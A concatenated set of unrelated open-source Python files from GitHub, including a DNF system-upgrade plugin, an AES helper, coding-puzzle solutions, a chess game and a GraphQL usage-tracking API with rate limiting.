city[\"iataCode\"]\n }\n }\n sheet_response = requests.put(\n url=f\"{SHEETY_PRICES_ENDPOINT}/{city['id']}\",\n json=new_data\n )\n # print(sheet_response.text)\n\n","repo_name":"skateryash/100-Days-Of-Code-Challenge","sub_path":"Day 39/flight-deals-start/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4616999552","text":"import openpyxl\nimport gol\nimport re\nimport string\n\n\n\ndef checkfile (filename, strcheck):\n\n if '~' in filename:\n return\n\n wb = openpyxl.load_workbook(filename)\n # 获取workbook中所有的表格\n sheets = wb.sheetnames\n\n print(filename)\n\n # 循环遍历所有sheet\n for i in range(len(sheets)):\n sheet = wb[sheets[i]]\n if sheet.title == \"Test Steps\" or sheet.title == \"Test Overview\":\n #print('\\n\\n第' + str(i + 1) + '个sheet: ' + sheet.title + '->>>')\n for r in range(1, sheet.max_row + 1):\n for c in range(1, sheet.max_column + 1):\n #if (string.find(str(sheet.cell(row=r, column=c).value), \"PM\") )!= -1:\n ret = re.findall(strcheck,str(sheet.cell(row=r, column=c).value),flags=re.IGNORECASE)\n if ret:\n gol.foundstr = \"........................ Found Wanted String ..............................\"\n #print(\"\\n find \" + strcheck + \" in row\" + str(r) + \" of \" + filename)\n# found_data = [filename,str(r),str(c),ret]\n found_data = [filename,str(r),str(c),ret,wb[sheets[0]].cell(row=5, column=2).value]\n gol.a.append(found_data)\n gol.csv_write.writerow(found_data)\n# gol.csv_write.writerow([gol.foundstr])\n# else:\n# gol.csv_write.writerow([gol.foundstr])\n\n\n\n\n#checkedfile = \"t.xlsm\"\n#needstr = \"PM\"\n#checkfile(checkedfile, needstr)","repo_name":"crosszhang/SpeckCheck","sub_path":"testxl.py","file_name":"testxl.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33123405767","text":"import os\n\nfrom unittest import TestCase\nfrom webtest import TestApp\nfrom pecan import load_app\nfrom mock import patch\n\nfrom managesf.tests import dummy_conf\n\n\nclass V2FunctionalTest(TestCase):\n def setUp(self):\n c = dummy_conf()\n self.config = {'services': c.services,\n 'gerrit': c.gerrit,\n 'app': c.app,\n 'admin': c.admin,\n 'sqlalchemy': c.sqlalchemy,\n 'managesf': c.managesf,\n 'policy': c.policy,\n 'resources': c.resources,\n 'api': c.api, }\n # App must be loaded before we can import v2 managers\n self.app = TestApp(load_app(self.config))\n\n def tearDown(self):\n # Remove the sqlite db\n os.unlink(self.config['sqlalchemy']['url'][len('sqlite:///'):])\n\n\nclass TestManageSFV2ResourcesController(V2FunctionalTest):\n\n @patch('managesf.controllers.api.v2.resources.manager')\n def test_get_resources(self, rm):\n with patch('managesf.controllers.api.v2.base.authorize'):\n environ = {'REMOTE_USER': 'user'}\n # not the real format of the answer here but who cares, it's a test\n retval = {'skipped': 0,\n 'total': 10,\n 'limit': 1,\n 'results': ['yo yo']}\n rm.resources.get.return_value = retval\n response = self.app.get('/v2/resources/',\n extra_environ=environ, status=\"*\")\n self.assertEqual(response.status_int, 200, response.text)\n self.assertEqual('yo yo', response.json['results'][0])\n # check specific args\n response = self.app.get('/v2/resources/'\n '?get_missing_resources=true',\n extra_environ=environ, status=\"*\")\n self.assertEqual(response.status_int, 200, response.text)\n _, kwargs = rm.resources.get.call_args\n self.assertEqual(True,\n kwargs.get('get_missing_resources'),\n kwargs)\n\n @patch('managesf.controllers.api.v2.resources.manager')\n def test_validate_resources(self, rm):\n with patch('managesf.controllers.api.v2.base.authorize'):\n environ = {'REMOTE_USER': 'user'}\n # not the real format of the answer here but who cares, it's a test\n retval = True, 'yo yo'\n rm.resources.create.return_value = retval\n response = self.app.post('/v2/resources/',\n extra_environ=environ, status=\"*\")\n self.assertEqual(response.status_int, 200, response.text)\n self.assertEqual('yo yo', response.json)\n","repo_name":"softwarefactory-project/managesf","sub_path":"managesf/tests/apiv2/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"12844921465","text":"import time \n\nproblem_number = 8\ntest_input = 4\ntest_solution = 5832 \nproblem_input = 13\n\n\n#Solution\n\n\nnumber_file = open(\"data.txt\", \"r\")\nraw_number = number_file.read()\nnumber_file.close()\n\ndef solution(string_number, limit):\n length = len(string_number)\n highest_count = 0\n \n for begin_index in range(length-limit):\n count = 1\n for sub_index in range(limit):\n count *= int(string_number[begin_index+sub_index])\n if count > highest_count:\n highest_count = count\n \n return highest_count\n\n\n#Test & Result\n\n\nfichier = open(\"Solution \"+str(problem_number)+\".txt\", \"w\")\nstring = \"\"\n\nbegin_test = time.time()\ntest_value = solution(raw_number, test_input)\nend_test = time.time()\ntest_time = end_test - begin_test\n\nstring += \"TEST #1\\n\\n\"\nstring += \"Input: \"+str(test_input)+\"\\n\"\nstring += \"Output: \"+str(test_value)+\"\\n\"\nstring += \"Answer: \"+str(test_solution)+\"\\n\"\nstring += \"Computation time: \"+str(test_time)+\" sec\\n\"\nstring += \"Verification: \"\n\nif(test_value == test_solution):\n string += \"TRUE\"\nelse:\n string += \"FALSE\"\n \n\nbegin_problem = time.time()\nproblem_value = solution(raw_number, problem_input)\nend_problem = time.time()\nproblem_time = end_problem - begin_problem\n\nstring += \"\\n\\n\\nRESULT PROBLEM #\"+str(problem_number)+\"\\n\\n\"\nstring += \"Input: \"+str(problem_input)+\"\\n\"\nstring += \"Output: \"+str(problem_value)+\"\\n\"\nstring += \"Computation time: \"+str(problem_time)+\" sec\\n\"\n\nstring += \"\\n\\n\\nCurrent date & time: \" + time.strftime(\"%c\")\n\nfichier.write(string)\nfichier.close()","repo_name":"FrancoisdeFouchecour/Projet-Euler","sub_path":"Problems/8-Problem/Problem 8.py","file_name":"Problem 8.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40241783119","text":"import os\nimport json\n\nfrom argparse import ArgumentParser\nfrom subprocess import call\n\nimport dnf\nimport dnf.cli\nfrom dnf.i18n import _\n\nimport logging\nlog = logging.getLogger(\"dnf.plugin.fedup\")\n\n\nPLYMOUTH = '/usr/bin/plymouth'\nDEFAULT_DATADIR = '/var/lib/fedup'\nMAGIC_SYMLINK = '/system-update'\nSYSTEMD_FLAG_FILE = '/system-update/.dnf-fedup2-upgrade'\n\nNO_KERNEL_MSG = _(\"No new kernel packages were found.\")\nRELEASEVER_MSG = _(\"Need a --releasever greater than the current system version.\")\nDOWNLOAD_FINISHED_MSG = _(\"Download complete! Use 'dnf %s reboot' to start the upgrade.\")\n\n\ndef reboot():\n call([\"systemctl\", \"reboot\"])\n\n# Plymouth helper class + singleton object\nclass _PlymouthOutput(object):\n def __init__(self):\n self._last_args = dict()\n self.alive = None\n\n def _plymouth(self, cmd, *args):\n if cmd == '--ping' or args != self._last_args.get(cmd):\n self.alive = (call([PLYMOUTH, cmd] + args) == 0)\n self._last_args[cmd] = args\n return self.alive\n\n def ping(self):\n return self._plymouth(\"--ping\")\n\n def message(self, msg):\n return self._plymouth(\"display-message\", \"--text\", msg)\n\n def set_mode(self, mode):\n return self._plymouth(\"change-mode\", \"--\"+mode)\n\n def progress(self, percent):\n return self._plymouth(\"system-update\", \"--progress\", str(percent))\nPlymouth = _PlymouthOutput()\n\n\n# A couple checkXXX() functions in the style of dnf.cli.command.check*\ndef checkReleaseVer(conf):\n if dnf.rpm.detect_releasever(conf.installroot) == conf.releasever:\n raise dnf.cli.CliError(RELEASEVER_MSG)\n\ndef checkDataDir(datadir):\n if os.path.exists(datadir) and not os.path.isdir(datadir):\n raise dnf.cli.CliError(_(\"--datadir: File exists\"))\n\n\n# Holds the state of the upgrade between runs of the command.\n# Would be nice if dnf.Base provided access to its persistor, but oh well\nclass State(object):\n statefile = '/var/lib/fedup/upgrade.state'\n def __init__(self):\n self._data = {}\n self._read()\n\n # helper function for creating the properties on the State object\n def _prop(section, option): # pylint: disable=no-self-argument\n # pylint: disable=protected-access\n def setprop(self, value):\n self._data.setdefault(section,{})[option] = value\n def getprop(self):\n return self._data.setdefault(section,{}).get(option)\n return property(getprop, setprop)\n\n def _read(self):\n try:\n self._data = json.load(open(self.statefile))\n except IOError:\n self._data = {}\n\n def write(self):\n dnf.util.ensure_dir(os.path.dirname(self.statefile))\n with open(self.statefile, 'w') as outf:\n json.dump(self._data, outf)\n\n def clear(self):\n if os.path.exists(self.statefile):\n os.unlink(self.statefile)\n self._read()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n if exc_type is None:\n self.write()\n\n download_status = _prop(\"download\", \"status\")\n datadir = _prop(\"download\", \"datadir\")\n\n upgrade_status = _prop(\"upgrade\", \"status\")\n releasever = _prop(\"upgrade\", \"releasever\")\n distro_sync = _prop(\"upgrade\", \"distro-sync\")\n allow_erasing = _prop(\"upgrade\", \"allowerasing\")\n best = _prop(\"upgrade\", \"best\")\n\n\n# This idea was borrowed from dnf-plugins-core!\nclass PluginArgumentParser(ArgumentParser):\n def __init__(self, cmd, **kwargs):\n prog='dnf %s' % cmd\n ArgumentParser.__init__(self, prog=prog, add_help=False, **kwargs)\n def error(self, message):\n raise AttributeError(message)\n def parse_known_args(self, args=None, namespace=None):\n try:\n return ArgumentParser.parse_known_args(self, args, namespace)\n except AttributeError as e:\n self.print_help()\n raise dnf.exceptions.Error(str(e))\n\n# DNF-API-TODO: need a way to let a Command override the display object\n# that gets passed to do_transaction() so that the upgrade can talk to plymouth\nclass PlymouthTransactionDisplay(dnf.cli.output.CliTransactionDisplay):\n def __init__(self):\n super(PlymouthTransactionDisplay, self).__init__()\n self.current = 0\n self.total = 0\n\n def event(self, package, action, te_cur, te_total, ts_cur, ts_total):\n super(PlymouthTransactionDisplay, self).event(package,\n action, te_cur, te_total, ts_cur, ts_total)\n\n if Plymouth.alive and action in self.action:\n self._update_plymouth(action, package, ts_cur, ts_total)\n\n def _update_plymouth(self, action, package, current, total):\n if current == self.current and total == self.total:\n return\n (self.current, self.total) = (current, total)\n Plymouth.progress(int(100.0 * current / total))\n Plymouth.message(\"[%d/%d] %s %s...\" % (\n current, total, self.action.get(action), package))\n\n# The plugin object that registers the command\nclass FedupPlugin(dnf.Plugin):\n name = 'fedup2'\n def __init__(self, base, cli):\n super(FedupPlugin, self).__init__(base, cli)\n self.conf = None\n self.base = base\n if cli:\n cli.register_command(FedupCommand)\n\n# Here's the big Command class. This is where the action is!! WHEEEE!!\nclass FedupCommand(dnf.cli.Command):\n # pylint: disable=unused-argument\n aliases = ('fedup2','fedup','system-upgrade')\n summary = _(\"Prepare system for upgrade to a new release\")\n usage = \"[%s] [download --releasever=%s|reboot|clean]\" % (\n _(\"OPTIONS\"), _(\"VERSION\")\n )\n\n def __init__(self, cli):\n super(FedupCommand, self).__init__(cli)\n self.opts = None\n self.state = State()\n\n def parse_args(self, extargs):\n p = PluginArgumentParser(self.aliases[0])\n p.add_argument('--distro-sync', default=False, action='store_true',\n help=_(\"downgrade packages if the new release's version is older\"))\n p.add_argument('--datadir', default=DEFAULT_DATADIR,\n help=_(\"save downloaded data to this location\"))\n p.add_argument('action',\n choices=('download','clean','reboot','upgrade'),\n help=_(\"action to perform\"))\n\n opts, dummy = p.parse_known_args(extargs)\n\n if not opts.action:\n dnf.cli.commands.err_mini_usage(self.cli, self.cli.base.basecmd)\n raise dnf.cli.CliError\n\n return opts\n\n # Call sub-functions (like configure_download()) for each possible action.\n # (this tidies things up quite a bit.)\n def configure(self, args):\n self.opts = self.parse_args(args)\n self._call_sub(\"configure\", args)\n def doCheck(self, basecmd, extcmds):\n self._call_sub(\"check\", basecmd, extcmds)\n def run(self, extcmds):\n self._call_sub(\"run\", extcmds)\n def run_transaction(self):\n self._call_sub(\"transaction\")\n def _call_sub(self, name, *args):\n subfunc = getattr(self, name+'_'+self.opts.action, None)\n if callable(subfunc):\n subfunc(*args)\n\n # == configure_*: set up action-specific demands ==========================\n\n def configure_download(self, args):\n self.cli.demands.root_user = True\n self.cli.demands.resolving = True\n self.cli.demands.available_repos = True\n self.cli.demands.sack_activation = True\n self.base.repos.all().pkgdir = self.opts.datadir\n # ...don't actually install anything now, though!\n self.base.conf.tsflags.append(\"test\")\n\n def configure_reboot(self, args):\n self.cli.demands.root_user = True\n\n def configure_upgrade(self, args):\n # same as the download, but offline and non-interactive. so..\n self.cli.demands.root_user = True\n self.cli.demands.resolving = True\n self.cli.demands.available_repos = True\n self.cli.demands.sack_activation = True\n # use the saved values for --datadir, --best, --allowerasing\n self.base.repos.all().pkgdir = self.state.datadir\n self.base.conf.best = self.state.best\n self.cli.demands.allow_erasing = self.state.allow_erasing\n # don't try to get new metadata, 'cuz we're offline\n self.cli.demands.cacheonly = True\n # and don't ask any questions (we confirmed all this beforehand)\n self.base.conf.assumeyes = True\n\n def configure_clean(self, args):\n self.cli.demands.root_user = True\n\n # == check_*: do any action-specific checks ===============================\n\n def check_download(self, basecmd, extargs):\n dnf.cli.commands.checkGPGKey(self.base, self.cli)\n dnf.cli.commands.checkEnabledRepo(self.base)\n checkReleaseVer(self.base.conf)\n checkDataDir(self.opts.datadir)\n\n def check_reboot(self, basecmd, extargs):\n if not self.state.download_status == 'complete':\n raise dnf.cli.CliError(_(\"system is not ready for upgrade\"))\n\n def check_upgrade(self, basecmd, extargs):\n if not self.state.upgrade_status == 'ready':\n raise dnf.cli.CliError(_(\"use '%s reboot' to begin the upgrade\") % basecmd)\n\n # == run_*: run the action/prep the transaction ===========================\n\n def run_reboot(self, extcmds):\n # make the magic symlink\n os.symlink(self.state.datadir, MAGIC_SYMLINK)\n # write releasever into the flag file so it can be read by systemd\n with open(SYSTEMD_FLAG_FILE, 'w') as flagfile:\n flagfile.write(\"RELEASEVER=%s\\n\" % self.state.releasever)\n # set upgrade_status so that the upgrade can run\n with self.state:\n self.state.upgrade_status = 'ready'\n reboot()\n\n def run_download(self, extcmds):\n # Mark everything in the world for upgrade/sync\n if self.opts.distro_sync:\n self.base.distro_sync()\n else:\n self.base.upgrade_all()\n\n if self.opts.datadir == DEFAULT_DATADIR:\n dnf.util.ensure_dir(self.opts.datadir)\n\n with self.state:\n self.state.download_status = 'downloading'\n self.state.datadir = self.opts.datadir\n\n def run_upgrade(self, extcmds):\n # Delete symlink ASAP to avoid reboot loops\n os.unlink(MAGIC_SYMLINK)\n # change the upgrade status (so we can detect crashed upgrades later)\n with self.state:\n self.state.upgrade_status = 'incomplete'\n # reset the splash mode and let the user know we're running\n Plymouth.set_mode(\"updates\")\n Plymouth.progress(0)\n Plymouth.message(_(\"Starting system upgrade. This will take a while.\"))\n # set up the upgrade transaction\n if self.state.distro_sync:\n self.base.distro_sync()\n else:\n self.base.upgrade_all()\n\n def run_clean(self, extcmds):\n if self.state.datadir:\n log.info(_(\"Cleaning up downloaded data...\"))\n dnf.util.clear_dir(self.state.datadir)\n self.state.clear()\n\n # == transaction_*: do stuff after a successful transaction ===============\n\n def transaction_download(self):\n # sanity check: we got a kernel, right?\n downloads = self.cli.base.transaction.install_set\n if not any(p.name.startswith('kernel') for p in downloads):\n raise dnf.exceptions.Error(NO_KERNEL_MSG)\n # Okay! Write out the state so the upgrade can use it.\n with self.state:\n self.state.download_status = 'complete'\n self.state.distro_sync = self.opts.distro_sync\n self.state.best = self.base.conf.best\n self.state.allow_erasing = self.cli.demands.allow_erasing\n self.state.releasever = self.base.conf.releasever\n log.info(DOWNLOAD_FINISHED_MSG, self.base.basecmd)\n\n def transaction_upgrade(self):\n Plymouth.message(_(\"Upgrade complete! Cleaning up and rebooting...\"))\n self.run_clean([])\n reboot()\n","repo_name":"wgwoods/fedup2","sub_path":"plugins/fedup2.py","file_name":"fedup2.py","file_ext":"py","file_size_in_byte":11991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41317150969","text":"import base64\r\nimport json\r\nfrom binascii import b2a_hex, a2b_hex\r\nfrom Crypto.Cipher import AES\r\n\r\n'''\r\n采用AES对称加密算法\r\n'''\r\n\r\n\r\n# # str不是32的倍数那就补足为16的倍数\r\n# def add_to_32(value):\r\n# while len(value) % 32 != 0:\r\n# value += '\\0'\r\n# return str.encode(value) # 返回bytes\r\n#\r\n#\r\ndef add_to_16(value):\r\n while len(value) % 16 != 0:\r\n value += '\\0'\r\n return str.encode(value) # 返回bytes\r\n\r\n\r\n\r\n\r\n\r\n#添加补码PKCS5Padding AES加密\r\ndef AES_encrypt(secret_key,data):\r\n \"\"\"\r\n :param secret_key [str] : 加密秘钥\r\n :param data [str] : 需要加密数据\r\n :return [str] :\r\n \"\"\"\r\n print(data,secret_key)\r\n # jsoncode = json.dumps(data).replace(\"(\", \"\").replace(\")\", \"\").replace(\" \", \"\")\r\n # print(jsoncode)\r\n BLOCK_SIZE = 16 # Bytes\r\n # 数据进行 PKCS5Padding 的填充\r\n pad = lambda s: (s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE))\r\n raw = pad(str(data))\r\n # 通过key值,使用ECB模式进行加密\r\n cipher = AES.new(secret_key.encode(), AES.MODE_ECB)\r\n\r\n # 得到加密后的字节码\r\n encrypted_text = cipher.encrypt(bytes(raw, encoding='utf-8'))\r\n # 字节码转换成base64 再转成 字符串 去掉换行符\r\n encrypted_text_hex = str(base64.encodebytes(encrypted_text), encoding='utf-8').replace(\"\\n\",\"\")\r\n print(encrypted_text_hex)\r\n return encrypted_text_hex\r\n\r\n#解码\r\ndef AES_decrypt(secret_key,encrypted_text_hex):\r\n \"\"\"\r\n :param secret_key [str] : 加密秘钥\r\n :param encrypted_text_hex [str]: # 加密后的 data 字符串\r\n :return [str]:\r\n \"\"\"\r\n # 去掉 PKCS5Padding 的填充\r\n unpad = lambda s: s[:-ord(s[len(s) - 1:])]\r\n # 通过 key 值进行\r\n cipher = AES.new(secret_key.encode(), AES.MODE_ECB)\r\n\r\n base64_decrypted = base64.decodebytes(encrypted_text_hex.encode(encoding='utf-8'))\r\n\r\n data_response = unpad(cipher.decrypt(base64_decrypted).decode('utf-8')).rstrip(\"\\0\")\r\n #print(data_response)\r\n return data_response\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n key = \"ehJzGST0D8Ne6adg\"\r\n\r\n\r\n\r\n jsonText = {\"apiKey\":\"93960537348\",\"apiSecret\":\"ehJzGST0D8Ne6adg\"}\r\n\r\n\r\n #jsoncode = json.dumps(jsonText).replace(\"(\",\"\").replace(\")\",\"\").replace(\" \",\"\")\r\n #print(jsoncode)\r\n\r\n encrytext = AES_encrypt(key,jsonText)\r\n\r\n AES_decrypt(key,encrytext)\r\n","repo_name":"zzr999zzr/PythonWorkSpace","sub_path":"AesEncryption.py","file_name":"AesEncryption.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43037984408","text":"# Задайте число. Составьте список чисел Фибоначчи,\r\n# в том числе для отрицательных индексов.\r\n#\r\n# Пример:\r\n# # - для k = 8 список будет выглядеть так:\r\n# [-21 ,13, -8, 5, −3, 2, −1, 1, 0, 1, 1, 2, 3, 5, 8, 13, 21]\r\n\r\nnum_us = int(input('Введите число k: '))\r\n\r\nlist_b = []\r\n\r\nfor i in range(num_us + 1):\r\n list_b.append(i)\r\n if i >= 2:\r\n list_b[i] = list_b[i - 1] + list_b[i - 2]\r\n\r\n\r\nlist_a = []\r\n\r\nfor j in range(num_us+1):\r\n list_a.append(j)\r\n list_a[j] = (-1)**(j + 1) * list_b[j]\r\n\r\nlist_a.pop(0)\r\nlist_a.reverse()\r\n\r\nlist_c = [*list_a, *list_b]\r\n\r\nprint(list_c)\r\n\r\n\r\n\r\n","repo_name":"GrebVl/python_lesson_03","sub_path":"task_05.py","file_name":"task_05.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5904506265","text":"from drscm.models import WorkSession\nfrom datetime import timedelta\nfrom drscm.interfaces.billable import Billable\nfrom utils.date import (\n timestamp_to_date_string,\n seconds_to_hours,\n time_stamp_to_date_time,\n seconds_to_hours_minutes_and_seconds,\n purify_timestamp,\n)\n\n\nclass WorkSessionProxy(WorkSession, Billable):\n\n start_date_string: str\n end_date_string: str\n session_duration_in_seconds: float\n session_duration: timedelta\n\n class Meta:\n proxy = True\n\n def __init__(self, *args, **kwargs):\n super(WorkSessionProxy, self).__init__(*args, **kwargs)\n self.start_date_string = timestamp_to_date_string(self.start_timestamp, \"%H:%M\")\n self.end_date_string = timestamp_to_date_string(self.end_timestamp, \"%H:%M\")\n pure_start_timestamp = purify_timestamp(self.start_timestamp)\n pure_end_timestamp = purify_timestamp(self.end_timestamp)\n self.session_duration = time_stamp_to_date_time(\n pure_end_timestamp\n ) - time_stamp_to_date_time(pure_start_timestamp)\n\n def get_date_string(self):\n date_string = timestamp_to_date_string(self.start_timestamp)\n return date_string\n\n def get_session_duration_date_string(self):\n hours, minutes, seconds = seconds_to_hours_minutes_and_seconds(\n self.session_duration.seconds\n )\n return f\"{hours:02}:{minutes:02}\"\n\n def get_session_duration_in_hours(self):\n return round(seconds_to_hours(self.session_duration.seconds), 2)\n\n def get_total(self):\n return round(self.project.hourly_rate * self.get_session_duration_in_hours(), 2)\n","repo_name":"shtlrs/WEB-DRSCM","sub_path":"drscm/proxies/work_sessions.py","file_name":"work_sessions.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28484000244","text":"# https://leetcode.com/problems/heaters/description/\n\nclass Solution:\n def findRadius(self, houses: List[int], heaters: List[int]) -> int:\n def canCover(radius):\n ranges = [[heater - radius, heater + radius] for heater in heaters]\n cur = 0\n \n for house in houses:\n while cur < len(ranges) and (house < ranges[cur][0] or house > ranges[cur][1]):\n cur += 1\n \n if cur >= len(ranges) or house < ranges[cur][0] or house > ranges[cur][1]:\n return False\n \n return True\n \n houses.sort()\n heaters.sort()\n left, right = 0, pow(10, 9)\n best = right\n \n while left <= right:\n mid = (left + right) // 2\n if canCover(mid):\n best = mid\n right = mid - 1\n else:\n left = mid + 1\n \n return best\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_51/heaters.py","file_name":"heaters.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74137973351","text":"import pygame\n\nfrom const import *\nfrom board import Board\nfrom dragger import Dragger\n\nclass Game:\n def __init__(self):\n self.next_turn = 'white'\n self.board = Board()\n self.dragger = Dragger(self)\n \n def show_bg(self, surface):\n for row in range(ROWS):\n for col in range(COLS):\n if (row + col) % 2 == 0:\n color = (234, 235, 200) # light green\n else:\n color = (119, 154, 88) # dark green\n \n rect = (col * SQSIZE, row * SQSIZE, SQSIZE, SQSIZE)\n pygame.draw.rect(surface, color, rect)\n \n def show_pieces(self, surface):\n for row in range(ROWS):\n for col in range(COLS):\n if self.board.squares[row][col].has_piece():\n piece = self.board.squares[row][col].piece\n\n if piece is not self.dragger.piece:\n piece.set_texture(size=80)\n img = pygame.image.load(piece.texture)\n img_center = (col * SQSIZE + SQSIZE // 2, row * SQSIZE + SQSIZE // 2)\n piece.texture_rect = img.get_rect(center=img_center)\n surface.blit(img, piece.texture_rect)\n \n def show_moves(self, surface):\n if self.dragger.dragging:\n piece = self.dragger.piece\n\n for move in piece.moves:\n color = '#fabf5a' if (move.final.row + move.final.col) % 2 != 0 else '#f7d078'\n rect = (move.final.col * SQSIZE, move.final.row * SQSIZE, SQSIZE, SQSIZE)\n pygame.draw.rect(surface, color, rect)\n\n def show_last_move(self, surface):\n if self.board.last_move:\n initial = self.board.last_move.initial\n final = self.board.last_move.final\n \n for pos in [initial, final]:\n color = '#fabf5a' if (pos.row + pos.col) % 2 != 0 else '#f7d078'\n rect = (pos.col * SQSIZE, pos.row * SQSIZE, SQSIZE, SQSIZE)\n pygame.draw.rect(surface, color, rect)\n \n def switch_turn(self):\n self.next_turn = 'black' if self.next_turn == 'white' else 'white'\n\n def reset(self):\n self.__init__()","repo_name":"bryanmccarthy/chess","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73697765354","text":"import os\n\nimport strawberry\nfrom fastapi import Request, Response\nfrom graphql import ExecutionResult as GraphQLExecutionResult\nfrom graphql import GraphQLError\nfrom strawberry.extensions import SchemaExtension\nfrom strawberry.scalars import JSON\nfrom strawberry.schema.config import StrawberryConfig\nfrom strawberry.types import Info\n\nfrom .connections import get_redis_connection\nfrom .database import (\n get_viz_data,\n ingest_project,\n project_exists,\n query_projects,\n query_usage_by_datetimes,\n verify_token,\n)\nfrom .fetchers import fetch_project_info\nfrom .models import get_project_tables\nfrom .types import (\n AuthenticationResult,\n Context,\n DateTime,\n Process,\n Project,\n ProjectInput,\n)\nfrom .utils import now\n\n\n@strawberry.type\nclass Query:\n @strawberry.field\n async def get_projects(self) -> list[str]:\n '''Return projects that are being tracked'''\n projs = await query_projects()\n return projs\n\n @strawberry.field\n async def get_usage(\n self,\n project: str,\n start: DateTime,\n end: DateTime = None,\n unique: bool = False,\n ) -> JSON:\n '''\n Query project uses.\n\n `start` and `end` can be in either of the following formats:\n - `YYYY-MM-DD`\n - `YYYY-MM-DDTHH:MM:SSZ'\n\n If `endtime` is not provided, current time is used.\n If `unique`, only unique users will be included.\n '''\n\n if end is None:\n end = now()\n exists = await project_exists(project)\n if not exists:\n count = 0\n message = f'Project \"{project}\" is not being tracked'\n else:\n project_table, _ = await get_project_tables(project, create=False)\n count = await query_usage_by_datetimes(project_table, start, end, unique)\n message = ''\n return {\n 'hits': count,\n 'message': message,\n 'unique': unique,\n 'success': exists,\n }\n\n @strawberry.field\n async def login(token: str) -> AuthenticationResult:\n valid, projects = await verify_token(token)\n if not valid:\n msg = 'Authentication Error: token is either invalid or expired.'\n else:\n msg = 'Authentication successful.'\n return AuthenticationResult(\n token=token,\n projects=projects,\n message=msg,\n )\n\n @strawberry.field\n async def usage_stats(self, project: str, token: str) -> JSON:\n 'Generate different usage information'\n _, projects = await verify_token(token)\n if project not in projects:\n raise Exception('Invalid token.')\n return await get_viz_data(project)\n\n\n@strawberry.type\nclass Mutation:\n @strawberry.field\n async def add_project(self, p: ProjectInput, info: Info) -> JSON:\n # validate project\n if not p.project or '/' not in p.project:\n raise Exception(\"Invalid project specified.\")\n\n # convert to Project and set defaults\n project = Project(\n project=p.project,\n project_version=p.project_version,\n language=p.language,\n language_version=p.language_version,\n session_id=p.session_id,\n timestamp=now(),\n context=Context(\n user_id=p.user_id,\n user_type=p.user_type,\n platform=p.platform,\n container=p.container,\n is_ci=p.is_ci,\n ),\n process=Process(\n status=p.status,\n status_desc=p.status_desc,\n error_type=p.error_type,\n error_desc=p.error_desc,\n ),\n )\n\n fetched = await fetch_project_info(p.project)\n\n # return project info ASAP, assign data ingestion as background tasks\n request = info.context['request']\n bg_tasks = info.context['background_tasks']\n bg_tasks.add_task(ingest_project, project)\n\n return {\n 'bad_versions': fetched['bad_versions'],\n 'cached': fetched['cached'],\n 'latest_version': fetched['version'],\n 'message': '', # TODO: Allow message for bad_versions\n 'success': fetched['success'],\n }\n\n\nclass RateLimiter(SchemaExtension):\n \"\"\"\n A GraphQL schema extension to implement sliding window rate limiting.\n\n This class has fine-grain control of the GraphQL execution stack.\n This extension verifies that incoming requests:\n - Have a reasonable sized request body\n - Are not clobbering the GQL endpoint\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.set_attrs()\n super().__init__(*args, **kwargs)\n\n def set_attrs(self):\n self.request_window = int(os.getenv(\"MIGAS_REQUEST_WINDOW\", \"60\"))\n self.max_requests = int(os.getenv(\"MIGAS_MAX_REQUESTS_PER_WINDOW\", \"100\"))\n self.max_request_size = int(os.getenv(\"MIGAS_MAX_REQUEST_SIZE\", \"2500\"))\n\n async def on_operation(self):\n \"\"\"\n Hook into the GraphQL request stack, and validate data at the start.\n \"\"\"\n if os.getenv(\"MIGAS_TESTING\"):\n self.set_attrs()\n request = self.execution_context.context['request']\n response = self.execution_context.context['response']\n if not os.getenv(\"MIGAS_BYPASS_RATE_LIMIT\"):\n await self.sliding_window_rate_limit(request, response)\n # check request size\n body = await request.body()\n if len(body) > self.max_request_size:\n response.status_code = 413\n self.execution_context.result = GraphQLExecutionResult(\n data=None,\n errors=[\n GraphQLError(\n f'Request body ({len(body)}) exceeds maximum size ({self.max_request_size})'\n )\n ],\n )\n yield # any logic after yield for post operation\n\n\n async def sliding_window_rate_limit(self, request: Request, response: Response):\n \"\"\"\n Use a sliding window to verify incoming responses are not overloading the server.\n\n Requests are checked to be in the range set by two environmental variables:\n `MIGAS_REQUEST_WINDOW` and `MIGAS_MAX_REQUESTS_PER_WINDOW`\n \"\"\"\n import time\n\n cache = await get_redis_connection()\n # the sliding window key\n key = f'rate-limit-{request.client.host}'\n time_ = time.time()\n\n async with cache.pipeline(transaction=True) as pipe:\n pipe.zremrangebyscore(key, 0, time_ - self.request_window)\n pipe.zrange(key, 0, -1)\n pipe.zadd(key, {time_: time_})\n pipe.expire(key, self.request_window)\n res = await pipe.execute()\n\n timestamps = res[1]\n if len(timestamps) > self.max_requests:\n response.status_code = 429 # Too many 